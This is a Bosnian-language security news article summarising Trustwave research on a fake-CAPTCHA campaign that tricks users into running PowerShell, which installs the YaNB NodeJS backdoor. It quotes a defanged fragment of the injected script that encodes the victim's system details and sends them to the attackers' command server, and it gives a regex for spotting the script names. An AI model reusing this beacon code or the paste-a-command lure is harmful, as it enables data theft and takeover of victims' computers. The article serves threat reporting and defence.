Istraživači sigurnosti otkrili su danas da se pojavila sofisticirana kampanja malicioznog softvera koja koristi prikrivene NodeJS backdoor-ove putem obmanjujućih CAPTCHA ekrana za provjeru.
Ova kampanja predstavlja rastući trend prijetnji koje iskorišćavaju naizgled legitimne sigurnosne mjere za distribuciju malicioznog koda, ciljajući korisnike koji su navikli na popunjavanje CAPTCHA izazova tokom svojih redovnih online aktivnosti.
Napad počinje kada korisnici posjete kompromitovane web stranice, često putem linkova na društvenim mrežama ili rezultata pretrage.
Ove stranice sadrže ubrizgani maliciozni kod koji učitava JavaScript datoteke, što na kraju dovodi žrtve do lažnih CAPTCHA stranica za verifikaciju.
Kada korisnici pokušaju da završe ove CAPTCHA izazove, maliciozne PowerShell naredbe se tajno izvršavaju u pozadini, instalirajući backdoor zasnovan na NodeJS-u koji napadačima omogućava stalan pristup sistemu žrtve.
Istraživači Trustwave SpiderLabsa identifikovali su ovu prijetnju tokom naprednog kontinuiranog lova na prijetnje provedenog početkom marta 2025. godine.
Njihova analiza je otkrila da je ova kampanja zlonamjernog softvera dio šireg klastera aktivnosti KongTuke, koji je aktivan od septembra 2024. godine.
Kampanja je pokazala značajan nivo sofisticiranosti, a napadači su kontinuirano ažurirali svoje taktike kako bi izbjegli otkrivanje.
„S obzirom na efikasnost i visoku stopu uspjeha lažnih CAPTCHA tehnika kao početnog vektora pristupa u poređenju s tradicionalnim metodama, očekujemo kontinuirani rast i rasprostranjenost ovih taktika“, navodi se u izvještaju Trustwavea.
.webp)
Istraživači su također primijetili ponovni porast sličnih implementacija backdoor-a zasnovanih na NodeJS-u u višestrukim kampanjama malicioznog softvera, uključujući KongTuke, lažne CAPTCHA sheme, Mispadu i Lumma kradljivce.
Stražnja vrata, nazvana YaNB (Yet Another NodeJS Backdoor), demonstriraju napredne mogućnosti, uključujući izviđanje sistema, izvršavanje naredbi i krađu podataka.
Nakon instalacije, uspostavlja vezu s infrastrukturom koju kontroliše napadač i ostaje u pasivnom stanju čekajući daljnje naredbe, što olakšava postavljanje dodatnih malicioznih komponenti.
Mehanizam infekcije: Od kompromitovanih stranica do Node.js RAT-a
Lanac infekcije počinje kompromitovanim web stranicama koje sadrže ubrizgani JavaScript kod.
Ovi skripti slijede specifičan obrazac imenovanja koji su identifikovali istraživači: niz od četiri znaka s naizmjeničnim brojevima i malim slovima („1q2w.js“), što odgovara obrascu regularnog izraza „\d[az]\d[az].js“.
Kada korisnici posjete ove kompromitovane stranice, ubrizgani skript vrši početno izviđanje prikupljanjem sistemskih informacija, uključujući detalje operativnog sistema, IP adresu, tip pretraživača i podatke o geolokaciji.
Ove informacije se zatim kodiraju i šalju serveru za komandu i kontrolu: –
"hxxps://[.]com/js.php?"
"device=" + os +
"&ip=" + btoa(ipData.ip) +
"&referrer=" + btoa(url) +
"&browser=" + btoa(browser) +
"&ua=" + btoa(userAgent) +
"&domain=" + btoa("hxxps://[.]com") +
"&loc=" + btoa(ipData.loc) +
"&is_ajax=1"Nakon ovog početnog izviđanja, C2 server odgovara lažnim CAPTCHA kodom za provjeru.
Korisnik, vjerujući da završava legitimnu sigurnosnu provjeru, pokreće PowerShell naredbu koja preuzima i instalira Node.js i izvršava backdoor.
Ovaj backdoor koristi sofisticirane anti-VM tehnike kako bi izbjegao analizu, provjeravajući karakteristike sistema koje bi mogle ukazivati na virtualno okruženje, kao što su veličina memorije i obrasci imena računara.
NodeJS backdoor koristi prilagođeni XOR mehanizam šifrovanja za komunikaciju komandi i kontrole te uspostavlja perzistentnost putem modifikacija registra, maskirajući se kao legitimni servis za ažuriranje preglednika.
Izvor: CyberSecurityNews